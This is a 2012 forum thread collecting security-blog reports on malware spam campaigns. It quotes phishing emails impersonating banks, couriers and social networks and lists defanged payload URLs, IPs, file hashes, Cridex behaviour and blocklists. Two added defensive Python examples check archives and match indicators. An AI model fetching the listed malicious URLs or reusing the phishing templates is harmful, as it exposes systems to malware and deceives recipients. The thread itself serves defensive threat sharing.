The malicious payload is at [donotclick]aviaonlolsio .ru:8080/forum/links/column.php hosted on the same IPs as used in this attack:
75.148.242.70 (Comcast Business, US)
91.142.208.144 (Axarnet, Spain)..."
___
Fake Chase emails lead to malware
- http://blog.webroot.com/2012/12/14/fake-chase-merchant-billing-statement-themed-emails-lead-to-malware/
Dec 14, 2012 - "Cybercriminals are currently mass mailing tens of thousands of emails, impersonating Chase in an attempt to trick its customers into executing the malicious attachment found in the fake email. Upon execution, the sample downloads additional malware on the affected hosts, and opens a backdoor allowing the cybercriminals behind the campaign complete access to the host...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2012/12/chase_merchant_billing_statement_fake_email_spam_malware_social_engineering.png?w=1024
... the cybercriminal/cybercriminals behind it applied low QA (Quality Assurance) since the actual filename found in the malicious archive exceeds 260 characters, resulting in a failed extraction process on Windows hosts.
“C:\Users\Workstation\Desktop\Statement_random_number.pdf.zip: Cannot create Statement_ID_random_number.pdf.exe
Total path and file name length must not exceed 260 characters. The system cannot find the path specified.“
Sample detection rate for the spamvertised attachment: MD5: 676c1a01739b855425f9492126b34d23 * ... Trojan-PSW.Win32.Tepfer.cbrv.
Makes DNS request to 3.soundfactor .org, then it establishes a TCP connection with 184.184.247.60 :14511, as well as UDP connections to the following IPs:
184.184.247.60 :23089
99.124.198.193 :13197
78.93.215.24 :14225
68.167.50.61 :28650 ..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/file/543a1ca2cd76d4a25fce74e356ad770fb28b4833657a6c5e789097482302af37/analysis/1355442736/
File name: Statement_ID.pdf.exe
Detection ratio: 42/46
Analysis date: 2012-12-13
:mad:
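The Webroot item above describes a malicious archive whose member name exceeds 260 characters (so extraction fails on Windows) and carries a decoy double extension (.pdf.exe). The following is an added example, not code from the post or from Webroot, showing how a mail gateway or sandbox could flag both traits before an archive reaches a user. The sample archive is constructed in memory with a harmless text payload; the destination folder C:\Users\Workstation\Desktop is taken from the error message quoted above, and the 260-character limit is Windows MAX_PATH.

```python
"""Flag archive members that would hit Windows MAX_PATH or use a decoy
double extension (added example, constructed sample data)."""
import io
import os
import zipfile

WINDOWS_MAX_PATH = 260
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs"}
DECOY_EXTS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".jpg", ".txt"}


def inspect_member(name, dest_dir):
    """Return a list of reasons this member is suspicious (empty if none)."""
    reasons = []
    base = os.path.basename(name.replace("\\", "/"))
    parts = base.lower().split(".")
    # "Statement_ID.pdf.exe": document-looking name, executable extension
    if (len(parts) >= 3
            and "." + parts[-1] in EXECUTABLE_EXTS
            and "." + parts[-2] in DECOY_EXTS):
        reasons.append("double extension: looks like a document but is executable")
    # Emulate the full Windows extraction path and compare with MAX_PATH
    win_path = dest_dir.rstrip("\\") + "\\" + name.replace("/", "\\")
    if len(win_path) > WINDOWS_MAX_PATH:
        reasons.append(
            f"extraction path is {len(win_path)} chars, exceeds MAX_PATH "
            f"({WINDOWS_MAX_PATH}); extraction will fail on Windows")
    return reasons


def inspect_archive(zip_bytes, dest_dir):
    """Map member name -> reasons for every suspicious member of a zip."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            reasons = inspect_member(info.filename, dest_dir)
            if reasons:
                findings[info.filename] = reasons
    return findings


def build_sample_archive():
    """Constructed sample: a harmless text member under a very long
    double-extension name, plus one benign member."""
    long_name = "Statement_ID_" + "0" * 250 + ".pdf.exe"   # 271 characters
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(long_name, "not an executable; constructed for the example")
        zf.writestr("readme.txt", "benign member")
    return buf.getvalue(), long_name


if __name__ == "__main__":
    data, _ = build_sample_archive()
    for member, why in inspect_archive(data, "C:\\Users\\Workstation\\Desktop").items():
        print(member[:40] + "...", "->", "; ".join(why))
```

Both checks are independent: a name can be short and still a decoy, or long and benign, and the gateway should report whichever applies rather than relying on a failed extraction to protect the user.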
AplusWebMaster
2012-12-17, 16:50
FYI...
Pharma SPAM - pillscarehealthcare .com
- http://blog.dynamoo.com/2012/12/pillscarehealthcarecom-spam.html
17 Dec 2012 - "There has been a massive amount of pharma spam pointing to pillscarehealthcare .com over the past 48 hours or so. Here are some examples:
Date: Mon, 17 Dec 2012 02:47:56 +0000 (GMT)
From: "Account Info Change" [tyjinc @palmerlakearttour .com]
To: [redacted]
Subject: Updated information
Updated information
Hello,
The following information for your ID [redacted] was updated on 12/17/2012: Date of birth, Security question and answer.
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password.
This is an automated message. Please do not reply to this email. If you need additional help, visit our Support Center.
Thanks,
Customer Support
==================
Date: Mon, 17 Dec 2012 01:22:56 -0700
From: "Angela Snider" [directsales @tyroo .com]
To: [redacted]
Subject: Pending ticket status
Ticketing System
Hello,
You have been successfully registered in our Ticketing System
Please, login and check status of your ticket, or close the ticket here
Go To Profile
See All tickets
This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.
==================
Date: Sat, 15 Dec 2012 21:37:47 -0700
From: "Alexis Houston" [cmassuda @agf .com .br]
To: [redacted]
Subject: Pending ticket notification
Ticketing System
Hello,
You have been successfully registered in our Ticketing System
Please, login and check status of your ticket, or report new ticket here
Go To Profile
See All tickets
This message was sent to [redacted]. Should you have any questions, or if you believe that you have received this in error please contact us at support center.
==================
Date: Sat, 15 Dec 2012 07:06:30 -0800
From: "Account Sender Mail" [daresco @excite .com]
To: [redacted]
Subject: Account is now available
Login unavailable due to maintenance ([redacted])
Hello,
Your Account is now available.
Our systems were unavailable due to maintenance and upgrading system. We apologizes for any inconvenience and appreciates the patience while this critical maintenance was performed. If you still face the problem then it would be better if you contact our team.
Access Your Account
Hope this information helps you.
Thanks,
Support team
==================
From: Kennedi Marquez [mailto:cwtroutn @naturalskincarereviews .info]
Sent: 17 December 2012 11:18
Subject: Updated information
Updated information
Hello,
The following information for your ID [redacted] was updated on 12/17/2012: Date of birth, Security question and answer.
If these changes were made in error, or if you believe an unauthorized person accessed your account, please reset your account password.
This is an automated message. Please do not reply to this email. If you need additional help, visit our Support Center.
Thanks,
Customer Support
This appears to be punting fake drugs rather than malware. pillscarehealthcare .com is hosted on 95.58.254.74 (Kazakh Telecom, Kazakhstan). In my opinion blocking 95.58.254.0/24 will probably do you no harm. These other fake pharma web sites can be found on the same IP address..."
(More detail at the dynamoo URL above.)
:mad:
AplusWebMaster
2012-12-18, 14:14
FYI...
Fake UPS/USPS SPAM / apensiona .ru
- http://blog.dynamoo.com/2012/12/ups-or-is-it-usps-spam-apensionaru.html
18 Dec 2012 - "Spammers often get UPS and the USPS mixed up. They're not the same thing at all. And this one throws FilesTube into the mix as well. Anyway, this fake UPS/USPS/ FilesTube spam leads to malware on apensiona .ru:
From: FilesTube [mailto: filestube @filestube .com]
Sent: 17 December 2012 06:01
Subject: Your Tracking Number H7300014839
USPS Customer Services for big savings!
Can't see images? CLICK HERE.
UPS - UPS TEAM 60 >>
Already Have an Account?
Enjoy all UPS has to offer by linking your My UPS profile to your account.
Link Your Account Now >>
UPS - UPS .com Customer Services
Good Evening, [redacted].
DEAR USER , Recipient's address is wrong
Track your Shipment now!
With Respect To You , Your UPS .com Customer Services.
Shipping | Tracking | Calculate Time & Cost | Open an Account
@ 2011 United Parcel Service of America, Inc. Your USPS .us Customer Services, the UPS brandmark, and the color brown are
trademarks of United Parcel Service of America, Inc. All rights reserved.
This is a marketing e-mail for UPS services. Click here to update your e-mail preferences or to unsubscribe to
USPS Team marketing e-mail. For information on UPS's privacy practices, please refer to UPS Privacy Policy.
Your USPS .us Customer Services, 8 Glenlake Parkway, NE - Atlanta, GA 30585
Attn: Customer Communications Department
The malicious payload is at [donotclick]apensiona .ru:8080/forum/links/column.php which is hosted on 217.112.40.69 (Utransit, claims to be from the UK but probably Russia). The following malicious domains are also on that IP address..."
(More detail at the dynamoo URL above.)
___
GFI Labs Email Roundup for the Week
- http://www.gfi.com/blog/gfi-labs-email-roundup-for-the-week-6/
Dec 18, 2012 - "... noteworthy email threats for the week... covering the dates of December 10 to 14...
“Mailbox Upgrade” Email is a Phish...
> http://gfisoftware.tumblr.com/post/37643320589/e-mail-credentials-phish
... Malicious URLs: my3q .com/survey/458/webgrade2052/77717.phtml
Unsolicited “Adobe CS4 License” Leads to Malware...
> http://gfisoftware.tumblr.com/post/37791588782/adobe-indesign-cs4-license-spam-returns
... Malicious URLs: safeshopper .org.nz/redirecting.htm, happy-school .edu.pl/redirecting.htm, amnaosogo .ru:8080/forum/links/column.php...
Spammers Target Citibank Clients.
> http://gfisoftware.tumblr.com/post/37830503278/malicious-citibank-credit-card-statement-spam
... Malicious URLs... (See the gfisoftware.tumblr URL above.)
___
LinkedIn SPAM / apensiona .ru
- http://blog.dynamoo.com/2012/12/linkedin-spam-apensionaru.html
18 Dec 2012 - "This fake LinkedIn spam leads to malware on apensiona .ru:
From: messages-noreply @bounce .linkedin .com on behalf of LinkedIn Connections
Sent: Tue 18/12/2012 14:01
Subject: Join my network on LinkedIn
LinkedIn
Hien Lawson has indicated you are a Friend
I'd like to add you to my professional network on LinkedIn.
- Hien Lawson
Accept
View invitation from Hien Lawson
WHY MIGHT CONNECTING WITH Hien Lawson BE A GOOD IDEA?
Hien Lawson's connections could be useful to you
After accepting Hien Lawson's invitation, check Hien Lawson's connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future.
2012, LinkedIn Corporation
The malicious payload is at [donotclick]apensiona .ru:8080/forum/links/column.php (the same payload as here*) although this time the IPs have changed to:
109.235.71.144 (Serveriai, Lithuania)
176.31.111.198 (OVH, France)
217.112.40.69 (Utransit, UK)
Here's a plain list if you want to block the lot:
109.235.71.144
176.31.111.198
217.112.40.69 ..."
* http://blog.dynamoo.com/2012/12/ups-or-is-it-usps-spam-apensionaru.html
:mad:
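The posts above list indicators in a defanged notation ("[donotclick]", "apensiona .ru", "ip :port", "(Hoster, Country)") and end with plain IP lists or /24 ranges to block. The following is an added example, not code from the forum or from dynamoo, that normalizes such lines into bare hosts, IPs and CIDR prefixes and matches candidate URLs or addresses against them. It goes a little beyond the plain lists above: CIDR entries are matched by containment, domains by suffix so subdomains are covered, and a prefix written with host bits set is normalized rather than rejected. The first five sample lines are quoted from these posts; the 10.0.0.97/27 entry is a constructed private-range example of that last case.

```python
"""Normalize defanged indicators and match hosts against a blocklist of
IPs, CIDR prefixes and domains (added example)."""
import ipaddress
import re

# Substitutions that undo the defanging conventions used in the posts:
# "[donotclick]", "host .tld", "user @host", "ip :port", "http ://".
DEFANG_FIXES = [
    (r"\[donotclick\]", ""),
    (r"\s+\.", "."),
    (r"\s+@", "@"),
    (r"\s+:", ":"),
    (r"\s+,", ","),
]


def refang(text):
    """Turn a defanged indicator back into its literal form."""
    for pattern, repl in DEFANG_FIXES:
        text = re.sub(pattern, repl, text)
    return text


def extract_indicator(line):
    """Reduce one indicator line to a bare host, IP address or CIDR prefix."""
    text = refang(line.strip())
    text = re.sub(r"\s*\(.*?\)\s*$", "", text)  # drop "(Hoster, Country)" notes
    text = re.sub(r"^[a-z]+://", "", text)      # drop the URL scheme
    text = text.split()[0]                       # keep the first token only
    if re.fullmatch(r"\d{1,3}(?:\.\d{1,3}){3}/\d{1,2}", text):
        return text                              # CIDR prefix, keep intact
    host = text.split("/", 1)[0]                 # drop the path
    host = re.sub(r":\d+$", "", host)            # drop a trailing port
    return host.lower()


class Blocklist:
    """IP/CIDR entries are matched by containment, domains by suffix."""

    def __init__(self, indicators):
        self.networks = []
        self.domains = set()
        for raw in indicators:
            ind = extract_indicator(raw)
            try:
                # strict=False accepts a prefix written with host bits set
                # (e.g. x.x.x.97/27) and normalizes it to the network address.
                self.networks.append(ipaddress.ip_network(ind, strict=False))
            except ValueError:
                self.domains.add(ind)

    def is_blocked(self, target):
        """True if target (URL, host, IP or ip:port) hits any entry."""
        ind = extract_indicator(target)
        try:
            addr = ipaddress.ip_address(ind)
        except ValueError:
            return any(ind == d or ind.endswith("." + d) for d in self.domains)
        return any(addr in net for net in self.networks)


# Indicator lines in the posts' own notation; the last one is constructed.
SAMPLE_INDICATORS = [
    "[donotclick]apensiona .ru:8080/forum/links/column.php",
    "109.235.71.144 (Serveriai, Lithuania)",
    "176.31.111.198 (OVH, France)",
    "217.112.40.69 (Utransit , UK)",
    "95.58.254.0/24",
    "10.0.0.97/27",   # constructed: host bits set, normalized to 10.0.0.96/27
]

if __name__ == "__main__":
    bl = Blocklist(SAMPLE_INDICATORS)
    for t in ("http://www.apensiona.ru/forum/links/column.php", "95.58.254.200",
              "10.0.0.126", "linkedin.com"):
        print(t, "->", "BLOCK" if bl.is_blocked(t) else "allow")
```

Feeding the same function both the blocklist lines and the lookups keeps the matching consistent: a proxy log URL, a bare hostname and a "host :port" string all reduce to the same key before comparison.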
AplusWebMaster
2012-12-19, 16:17
FYI...
Fake AV - Malware sites to block 19/12/12
- http://blog.dynamoo.com/2012/12/malware-sites-to-block-191212.html
19 Dec 2012 - "This group of sites appears to be using a fake AV application to download a malicious file scandsk.exe (report here*) via 79.133.196.103 (eTop, Poland) and 82.103.140.100 (Easyspeedy, Denmark) which then attempts to call home to 46.105.131.126 (OVH, Ireland).
* https://www.virustotal.com/file/5c6e3351c4018ecbcd82f9026c2f8c37895e88cc0e7e87398b307b4e98d4bc70/analysis/
Detection ratio: 14/45
This is a screenshot of the fake AV in action:
> https://lh3.ggpht.com/-D3JYfW2LwH8/UNGNBXwma4I/AAAAAAAAA1I/tyIDs4EZIcc/s1600/fakeav.png
From this point, the scandsk.exe gets downloaded either through an exploit or social engineering. This executable looks like some sort of downloader, which attempts to pull down additional data from these non-responding domains:
report.q7ws17sk1ywsk79g .com
report.7ws17sku7myws931u .com
report.u79i1qgmywskuo9o .com
There's some sort of trickery here, perhaps it requires exactly the right kind of factors to hit a valid URL, the automated analysis tools are inconsistent... but seem to indicate a C&C on 46.105.131.126. This IP belongs to OVH (no surprises there) but seems to have been suballocated:
inetnum: 46.105.131.120 - 46.105.131.127
netname: marysanders1
descr: marysanders1net
country: IE
org: ORG-OH5-RIPE
admin-c: OTC9-RIPE
tech-c: OTC9-RIPE
status: ASSIGNED PA
mnt-by: OVH-MNT
source: RIPE # Filtered
I suspect that this whole block is being used for malicious purposes, 46.105.131.123 hosts a site called find-and-go .com registered in China which has been fingered as an attack site before.... I would recommend blocking the entire 46.105.131.120/29 to be on the safe side. The infection sites are on 82.103.140.100 and 79.133.196.103, they make extensive use of subdomains of mooo .com, ez .lv and zyns .com. There are probably legitimate sites making use of these domains, but blocking them completely should give you few headaches. 79.133.196.103 is part of a small block of IPs, 79.133.196.96/27, that I have seen malware on before, specifically 79.133.196.105 and 79.133.196.124. Blocking the entire /27 is probably a good idea.
Recommended blocklist:
46.105.131.120/29
82.103.140.100
79.133.196.97/27
mooo .com
ez .lv
zyns .com
Alternatively, these are some of the subdomains in use.. there are a lot of them, and probably more than I have listed here..."
(More detail at the dynamoo URL above.)
___
Fake Facebook SPAM / 46.249.58.211 and 84.200.77.218
- http://blog.dynamoo.com/2012/12/facebook-spam-4624958211-and-8420077218.html
19 Dec 2012 - "There are various Facebook spams doing the rounds pointing to a variety of malware sites on 46.249.58.211 and 84.200.77.218, for example:
From: FB.Team
Sent: 19 December 2012 14:30
Subject: Re-activate account
Hi [redacted],
Your account has been blocked due to spam activity.
To verify account, please follow this link:
http ://www.facebook .com/confirmemail.php?e=[redacted]
You may be asked to enter this confirmation code: [redacted]
The Facebook Team
Didn't sign up for Facebook? Please let us know.
46.249.58.211 (Serverius Holding, Netherlands)...
84.200.77.218 (Misterhost, Germany)...
GFI has some more details on this one here*."
* http://gfisoftware.tumblr.com/post/38303266759/your-facebook-account-is-blocked-due-to-spam-activity
Your Facebook Account is Blocked due to Spam Activity
Dec 19, 2012
___
Fake ‘Change Facebook Color Theme’ events lead to rogue Chrome extensions
- http://blog.webroot.com/2012/12/19/fake-change-facebook-color-theme-events-lead-to-rogue-chrome-extensions/
Dec 19, 2012 - "Cybercriminals have recently launched a privacy-violating campaign spreading across Facebook in an attempt to trick Facebook’s users into installing a rogue Chrome extension. Once installed, it will have access to all the data on all web sites, as well as access to your tabs and browsing history...
Sample screenshot of one of the few currently active Facebook Events promoting the rogue Chrome extension:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_02_rogue_google_chrome_extension.png?w=702
The campaign is relying on automatically registered Tumblr accounts, where the actual redirection takes place. Users are exposed to the following page, enticing them into changing their Facebook color theme:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_01_rogue_google_chrome_extension.png?w=477&h=289
Once users accept the EULA and Privacy Policy, they will become victims of the privacy-violating Chrome extension:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_05_rogue_google_chrome_extension.png?w=555&h=355
... the cybercriminals behind the campaign not only hosted it on Amazon’s cloud, they also featured it in Chrome’s Web Store:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_03_rogue_google_chrome_extension.png?w=614&h=324
In case users choose -not- to accept the EULA and the Privacy Policy, the cybercriminals behind the campaign will once again attempt to monetize the hijacked Facebook traffic by asking them to participate in surveys, part of CPA (Cost-Per-Action) affiliate network, earning -them- money:
> https://webrootblog.files.wordpress.com/2012/12/fake_change_facebook_color_theme_04_rogue_google_chrome_extension.png?w=554&h=310
... Users are advised to be extra cautious when accepting EULAs and Privacy Policies, in particular when installing browser extensions that have the capacity to access sensitive and personally identifiable data on their PCs..."
___
Google Docs SPAM/PHISH...
- https://isc.sans.edu/diary.html?storyid=14731
Last Updated: 2012-12-19 - "... Scams where the attacker's data-collection form resides at a Google Docs (now Google Drive) are especially difficult to warn users about. After all, the malicious webpage resides at the -trusted- google .com domain. The effect is especially severe for organizations using Google Apps as a collaboration platform... such scams aren't going away any time soon..."
> F-secure: http://www.f-secure.com/weblog/archives/00002168.html
> GFI: http://www.gfi.com/blog/google-docs-phishing/
> Sophos: http://nakedsecurity.sophos.com/2012/05/30/phishing-with-help-from-google-docs/
... Recipients who clicked the "CLICK HERE" link were directed to the following "IT HELPDESK SERVICE" page, which prompted for logon credentials that the attacker wanted to capture...
> https://isc.sans.edu/diaryimages/images/it-helpdesk-service-3.png
... The attacker was likely using a -compromised- Google Apps account of another organization to create a Google Docs spreadsheet and expose its data entry form... Avoid clicking on email links when you need to take important actions that require logging in. Relying on a previously-saved bookmark is safer..."
___
LinkedIn Spam: The Repeat
- http://www.gfi.com/blog/linkedin-spam-the-repeat/
Dec 19, 2012 - "Another slew of spam claiming to originate from LinkedIn has hit the wild Internet in less than 24 hours, according* to the real time recording and tracking of email threats by our researchers in the AV Labs.
* http://gfisoftware.tumblr.com/post/38238165249/malicious-linkedin-invitation-spam-returns
... Here’s what the email looks like:
> http://www.gfi.com/blog/wp-content/uploads/2012/12/LinkedIn_1218-wm.png
From: {bogus email address}
To: {random}
Subject: Join my network on LinkedIn
Message body:
{redacted} has indicated you are a Friend
I’d like to add you to my professional network on LinkedIn.
[Allow button] View invitation from {redacted}
WHY MIGHT CONNECTING WITH {redacted} BE A GOOD IDEA?
{redacted} connections could be useful to you
After accepting {redacted} invitation, check {redacted} connections to see who else you may know and who you might want an introduction to. Building these connections can create opportunities in the future.
Clicking the Allow button or the link on the message body directs users to several Web pages of compromised sites, which all look like this:
> http://www.gfi.com/blog/wp-content/uploads/2012/12/linkedin-01-wm-300x105.png
This page, laced with Blackhole Exploit Kit code, then auto-redirects users to a Russian website where the Cridex info-stealer payload can be downloaded.
> http://www.gfi.com/blog/wp-content/uploads/2012/12/linkedin-02-wm-300x131.png
... When in doubt, users should simply visit their LinkedIn pages and check their profile mailbox for invites..."
___
Wire Transfer SPAM / angelaonfl .ru
- http://blog.dynamoo.com/2012/12/wire-transfer-spam-angelaonflru.html
19 Dec 2012 - "This fake Wire Transfer spam leads to malware on angelaonfl .ru:
Date: Wed, 19 Dec 2012 11:26:24 -0500
From: "Myspace" [noreply @message .myspace .com]
Subject: Wire Transfer (3014YZ20)
Welcome,
Your Wire Transfer Amount: USD 45,429.29
Transfer Report: View
EULALIA Henry,
The Federal Reserve Wire Network
The malicious payload is at [donotclick]angelaonfl .ru:8080/forum/links/column.php hosted on the following IPs:
91.224.135.20 (Proservis UAB, Lithuania)
210.71.250.131 (Chunghwa Telecom, Taiwan)
217.112.40.69 (Utransit, UK)
The following domains and IPs are all related and should be blocked if you can:
91.224.135.20
210.71.250.131
217.112.40.69 ..."
(More detail at the dynamoo URL above.)
___
Threat Outbreak Alerts
- http://tools.cisco.com/security/center/threatOutbreak.x?i=77
Fake Order Request E-mail Messages - December 19, 2012
Fake Party Invitation E-mail Messages - December 19, 2012
Fake Sample Product Quote E-mail Messages - December 19, 2012
Fake Scanned Image E-mail Messages - December 19, 2012
Fake Unspecified E-mail Messages - December 18, 2012
Fake Payment Invoice E-mail Messages - December 18, 2012
Fake Funds Transfer Notification E-mail Message - December 18, 2012
Fake Airline Ticket Order Notification E-mail Messages - December 18, 2012
Fake Product Order Quotation Attachment E-mail Message - December 18, 2012
Fake Tax Invoice E-mail Messages - December 18, 2012
Fake Order Invoice Notification E-mail Messages - December 18, 2012
Fake Sales Request E-mail Messages - December 18, 2012 ...
:mad: :fear:
AplusWebMaster
2012-12-20, 20:25
FYI...
Fake ‘Citi Account Alert’ emails lead to BlackHole Exploit Kit
- http://blog.webroot.com/2012/12/20/fake-citi-account-alert-themed-emails-lead-to-black-hole-exploit-kit/
Dec 20, 2012 - "Cybercriminals are currently mass mailing hundreds of thousands of emails impersonating Citi, using -two- different professionally looking email templates. Upon clicking on any of the links found in the malicious emails, users are exposed to the client-side exploits served by the latest version of the BlackHole Exploit Kit...
Sample screenshot of the first spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit.png
Sample screenshot of the second spamvertised template:
> https://webrootblog.files.wordpress.com/2012/12/citi_email_spam_exploits_malware_social_engineering_black_hole_exploit_kit_01.png
Sample client-side exploits serving URLs:
hxxp ://eaglepointecondo .biz/detects/operation_alert_login.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE.NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE.NET – 211.27.42.138 – Email: solaradvent @yahoo .com
hxxp ://platinumbristol .net/detects/alert-service.php – 59.57.247.185
Name Server: NS1.AMISHSHOPPE.NET – 209.140.18.37 – Email: solaradvent @yahoo .com
Name Server: NS2.AMISHSHOPPE.NET – 211.27.42.138 – Email: solaradvent @yahoo .com
Upon successful client-side exploitation, the campaign drops MD5: b360fec7652688dc9215fd366530d40c * ... Worm:Win32/Cridex.E.
Once executed, the sample performs the following activities:
Accesses Firefox’s Password Manager local database
Creates a thread in a remote process
Installs a program to run automatically at logon
It creates the following Registry Keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B
With the following value:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
KB00121600.exe = "%AppData%\KB00121600.exe"
It then creates the following Mutexes:
It also drops the following MD5s:
It then phones back to 209.51.221.247/AJtw/UCyqrDAA/Ud+asDAA. We’ve already seen the same command and control server used in the following previously profiled malicious campaigns..."
* https://www.virustotal.com/file/2226d1d4d8c68160ae1fe7393655b30eadb3da3771347228a9583d3313d1fc10/analysis/
File name: readme.exe
Detection ratio: 32/45
Analysis date: 2012-12-20
___
Sendspace "You have been sent a file" SPAM / apendiksator .ru
- http://blog.dynamoo.com/2012/12/sendspace-you-have-been-sent-file-spam.html
20 Dec 2012 - "This fake Sendspace spam leads to malware on apendiksator .ru:
Date: Thu, 20 Dec 2012 09:25:36 -0300
From: "SHIZUKO Ho"
Subject: You have been sent a file (Filename: [redacted]-28.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-6110219.pdf, (286.58 KB) waiting to be downloaded at sendspace.(It was sent by SHIZUKO Ho).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
===
Date: Thu, 20 Dec 2012 05:05:02 +0100
From: "GENNIE Hensley"
Subject: You have been sent a file (Filename: [redacted]-7123391.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-38335.pdf, (282.44 KB) waiting to be downloaded at sendspace.(It was sent by GENNIE Hensley).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service.
Please do not reply to this email. This auto-mailbox is not monitored and you will not receive a response.
The malicious payload is at [donotclick]apendiksator .ru:8080/forum/links/column.php hosted on:
91.224.135.20 (Proservis UAB, Lithuania)
187.85.160.106 (Ksys Soluções Web, Brazil)
210.71.250.131 (Chunghwa Telecom, Taiwan)
These IPs and domains are all related and should be blocked..."
___
"New message" SPAM, fake dating sites and libertymonings .info
- http://blog.dynamoo.com/2012/12/new-message-spam-fake-dating-sites-and.html
20 Dec 2012 - "This "New message" themed spam leads to both a fake anti-virus page and a Java exploit on the domains site-dating2012 .asia and libertymonings .info. There's some cunning trickery going on here too. First of all, let's start with some spam examples:
Date: Thu, 20 Dec 2012 20:50:17 -0200
From: "SecureMessage System" [2F5DEE622 @hungter .com]
Subject: New message
Click here to view the online version.
New private message from Terra Fisher received.
Total unread messages: 5
[ Read now ]
Copyright 2012 SecureMessage System. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
-------------------------
Date: Thu, 20 Dec 2012 20:36:14 -0200
From: "Secure Message" [82E8ACBD @lipidpanel .com]
Subject: New message
Click here to view the online version.
New private message from Josefina Albert received.
Total unread messages: 3
[ Read now ]
Copyright 2012 SecureMessage System. All rights reserved.
If you would like to update your profile or unsubscribe, please click here.
PLEASE DO NOT REPLY TO THIS MESSAGE.
If you require Technical Support, please check Support Center for information.
In these cases, the target URLs are [donotclick]site-dating2012c .asia/link.php and [donotclick]site-dating2012 .asia/link.php, both hosted on 46.249.42.161 (Serverius Holding, Netherlands) and pretty much the same as the ones found a couple of days ago hiding out on 46.249.58.211 (also at Serverius Holding). These look like dating URLs, so you might assume that they are either a) a legitimate dating site or b) just some dating spam rather than malware. In any case, appearances are deceptive and it leads to a fake AV site that seems to be very similar to this one. The deception goes a little deeper, because the link.php pages even forward through a fake affiliate-style link such as [donotclick]best-dating2010 .info/?affid=00110&promo_type=5&promo_opt=1 before they get to the fake anti-virus page. The site also contains an apparent Java exploit that loads in from libertymonings .info on 84.200.77.218 (Misterhost, Germany), which was also used in this attack. The malicious code is found at the page [donotclick]libertymonings .info/index/zzz/?a=YWZmaWQ9MDAxMTA=, which attempts to download a Java exploit from [donotclick]libertymonings .info/analizator_data/ztsvgnvlmhe-a.qsypes.jar, which is pretty thinly detected according to VirusTotal*.
The following IPs and domains are all related and should be blocked if you can:
46.249.42.161
46.249.58.211
84.200.77.218..."
* https://www.virustotal.com/file/77858e249c3017fe5bfa8fb99338eae0d82cb3d4b9c42bc61d4361ddb41fb45a/analysis/1356045558/
File name: ztsvgnvlmhe-a.qsypes.jar
Detection ratio: 6/45
Analysis date: 2012-12-20
:mad::mad:
AplusWebMaster
2012-12-21, 17:14
FYI...
Malware sites to block 21/12/12
- http://blog.dynamoo.com/2012/12/malware-sites-to-block-211212.html
21 Dec 2012 - "There are a series of malware domains on 91.201.215.173 apparently using a Java and PDF exploit to infect visitors. The infection mechanism appears to be coming from an unidentified ad running on the centerblog .net blogging system (I think specifically [donotclick]zezete2.centerblog .net/i-247-136-1356095651.html)
The malware URLs are quite lengthy and appear to be resistant to analysis, in the attack I have seen the following URLs were in use (don't visit these sites, obviously)
[donotclick]svwlekwtaign.avigorstats .pro/nfzU990ANRE02JVS0Qk7s0jYN40nDNx0dbn217t
Yy0jp8q0NKcl0kgxI0L8Gt15rue0vRer0M2Lr0fIED/
[donotclick]mcruxdufxwnp.avigorstats .pro/nfzU990ANRE02JVS0Qk7s0jYN40nDNx0dbn217t
[break]Yy0jp8q0NKcl0kgxI0L8Gt15rue0vRer0M2Lr0fIED/
[break]indicated where I've added a linebreak to get it to fit on the page, remove that and the linebreak for a valid URL.
avigorstats .pro and its subdomains are hosted on 91.201.215.173 (PS Internet Company Ltd, Kazakhstan), but this is just the tip of a -huge- iceberg of malicious IPs and domains that are all interconnected.
Let's start with my personal recommended blocklist. If you are in Russia or Ukraine then you might want to be a bit more conservative with the Russian netblocks and refer to the raw IP list below (there's one list with ISPs listed, and one plain one for copying and pasting)..
Recommended blocklist (annotated)...
Recommended blocklist (Plain list)..."
(Too long to post here - see the dynamoo URL above - 'great list to use!)
___
Profile Spy...
- http://www.gfi.com/blog/profile-spy-resurrects-on-eve-of-mayan-apocalypse/
